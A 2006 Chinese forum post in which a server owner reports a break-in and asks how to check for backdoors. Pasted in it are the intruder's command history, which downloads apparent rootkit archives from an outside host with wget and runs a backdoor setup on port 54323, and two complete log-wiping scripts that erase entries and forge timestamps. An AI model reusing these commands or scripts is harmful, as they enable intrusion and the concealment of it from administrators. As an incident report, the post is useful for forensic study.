哭，服务器今天被人黑了，请都下大家有什么办法？

mimiyanlove · 发表于 2006-11-17 14:39:41

这是有关记录
exit
pwd
ps -U root
ps -U root
id
wget test4.go.ro/sbh5.tar.tar
wget test4.go.ro/shv5.tar.tar
tar zxvf shv5.tar.tar
cd shv5
./setuop
./setup muiema 54323
cd ..
id
ls
./led
./led
id
cd shv5
./setup muiema 54323
id
./setup muiema 54323
ls -alp
chmod +x *
./setup muiema 54323

_____________________
hide
_________
#!/bin/bash

echo "             Linux Hider v2.0 by mave"
echo "             enhanced by me!       "
echo "[+] [Shkupi Logcleaner] Removing $1 from the logs........ ."
echo ""

if [ -f /var/log/maillog ]; then
cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz
touch -acmr /var/log/maillog /tmp/maillog.xz
mv -f /tmp/maillog.xz /var/log/maillog
echo "[+] /var/log/maillog ... [done]"
echo ""
fi

if [ -f /var/log/messages ]; then
cat /var/log/messages | grep -v $1 > /tmp/messages.xz
touch -acmr /var/log/messages /tmp/messages.xz
mv -f /tmp/messages.xz /var/log/messages
echo "[+] /var/log/messages  ... [done]"
sleep 2
echo ""
fi

if [ -f /var/log/secure ]; then
cat /var/log/secure | grep -v $1 > /tmp/secure.xz
touch -acmr /var/log/secure /tmp/secure.xz
mv -f /tmp/secure.xz /var/log/secure
echo "[+] /var/log/secure ... [done]"
echo ""
fi

if [ -f /var/log/xferlog ]; then
cat /var/log/xferlog | grep -v $1 > /tmp/xferlog.xz
touch -acmr /var/log/xferlog /tmp/xferlog.xz
mv -f /tmp/xferlog.xz /var/log/xferlog
sleep 2
echo "[+] /var/log/xferlog ... [done]"
echo ""
fi

if [ -f /var/run/utmp ]; then
cat /var/run/utmp | grep -v $1 > /tmp/utmp.xz
touch -acmr /var/run/utmp /tmp/utmp.xz
mv -f /tmp/utmp.xz /var/run/utmp
echo "[+] /var/run/utmp    ... [done]"
echo ""
fi

if [ -f /var/log/lastlog ]; then
cat /var/log/lastlog |grep -v $1 > /tmp/lastlog.xz
touch -acmr /var/log/lastlog /tmp/lastlog.xz
mv -f /tmp/lastlog.xz /var/log/lastlog
sleep 2
echo "[+] /var/log/lastlog ... [done]"
echo ""
fi

if [ -f /var/log/wtmp ]; then
cat /var/log/wtmp |grep -v $1 > /tmp/wtmp.xz
touch -acmr /var/log/wtmp /tmp/wtmp.xz
mv -f /tmp/wtmp.xz /var/log/wtmp
echo "[+] /var/log/wtmp    ... [done]"
echo ""
fi

rm -f /tmp/*.xz
echo "          * m i s s i o n  a c c o m p l i s h e d *"
echo ""
sleep 2
echo "                   p.h.e.e.r  S.H.c.r.e.w"
echo ""
sleep 5
exit 1

__________________
shsb
________
#!/bin/bash
#
# sauber - by socked [11.02.99]
#
# Usage: sauber <string>

BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
BLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m'
DGRN='[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'

echo "${BLK}* ${WHI}sauber ${DWHI}by ${WHI}s${BLU}o${DBLU}ck${BLK}ed [${DWHI}07${BLK}.${DWHI}27${BLK}.${DWHI}97${BLK}]${RES}"
if [ $# != 1 ]
then
  echo "${BLK}* ${DWHI}Usage${WHI}: "`basename $0`" <${DWHI}string${WHI}>${RES}"
  echo " "
  exit
fi
echo "${BLK}*${RES}"
echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}"

WERD=$(/bin/ls -F /var/log | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "@")

for fil in $WERD
do
line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}...${RES}"
grep -v $1 /var/log/$fil > new
touch -r /var/log/$fil new
mv -f new /var/log/$fil
newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
let linedel=$(($line-$newline))
echo "${WHI}$linedel ${DWHI}lines removed!${RES}"

done

killall -HUP syslogd
echo "${BLK}* ${DWHI}Alles sauber mein Meister !'Q%&@$! ${RES}"

谁能帮我上服务器看看还有没有后门呢？？

		自动登录	找回密码
密码			注册